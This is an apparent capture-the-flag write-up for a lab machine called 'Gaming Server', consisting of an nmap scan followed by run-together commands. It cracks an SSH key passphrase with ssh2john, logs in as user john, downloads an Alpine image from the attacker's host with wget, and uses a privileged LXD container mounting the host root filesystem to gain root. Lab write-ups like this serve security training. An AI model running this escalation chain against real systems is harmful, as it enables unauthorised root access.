Gaming Server
May 04, 2024
We have user john (maybe)
Last updated
May 04, 2024
We have user john (maybe)
Last updated
# Nmap 7.94 scan initiated Sat May 4 21:34:54 2024 as: nmap -sC -sV -oN nmap -vv 10.10.135.70
Increasing send delay for 10.10.135.70 from 0 to 5 due to 50 out of 165 dropped probes since last increase.
Increasing send delay for 10.10.135.70 from 5 to 10 due to 11 out of 12 dropped probes since last increase.
Nmap scan report for 10.10.135.70
Host is up, received syn-ack (0.29s latency).
Scanned at 2024-05-04 21:34:54 PST for 74s
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCrmafoLXloHrZgpBrYym3Lpsxyn7RI2PmwRwBsj1OqlqiGiD4wE11NQy3KE3Pllc/C0WgLBCAAe+qHh3VqfR7d8uv1MbWx1mvmVxK8l29UH1rNT4mFPI3Xa0xqTZn4Iu5RwXXuM4H9OzDglZas6RIm6Gv+sbD2zPdtvo9zDNj0BJClxxB/SugJFMJ+nYfYHXjQFq+p1xayfo3YIW8tUIXpcEQ2kp74buDmYcsxZBarAXDHNhsEHqVry9I854UWXXCdbHveoJqLV02BVOqN3VOw5e1OMTqRQuUvM5V4iKQIUptFCObpthUqv9HeC/l2EZzJENh+PmaRu14izwhK0mxL
| 256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEaXrFDvKLfEOlKLu6Y8XLGdBuZ2h/sbRwrHtzsyudARPC9et/zwmVaAR9F/QATWM4oIDxpaLhA7yyh8S8m0UOg=
| 256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOLrnjg+MVLy+IxVoSmOkAtdmtSWG0JzsWVDV2XvNwrY
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: House of danak
|_http-server-header: Apache/2.4.29 (Ubuntu)
4998/tcp filtered maybe-veritas no-response
19101/tcp filtered unknown no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 4 21:36:08 2024 -- 1 IP address (1 host up) scanned in 74.69 secondssh2john id-rsa > forjohn-rsa.txtchmod 600 id-rsa
ssh -i id-rsa john@10.10.135.70
pass - letmeingit clone https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder
sudo ./build-alpine -a i686python3 -m http.serverwget http://10.9.193.229:8000/alpine-v3.19-i686-20240505_1414.tar.gzlxc image import alpine-v3.19-i686-20240505_1414.tar.gz --alias alpinelxc image listlxc init alpine privesc -c security.privileged=truelxc listlxc config device add privesc host-root disk source=/ path=/mnt/root recursive=truelxc start privesc
lxc listlxc exec privesc /bin/shfind / -name *root.txt* 2>/dev/null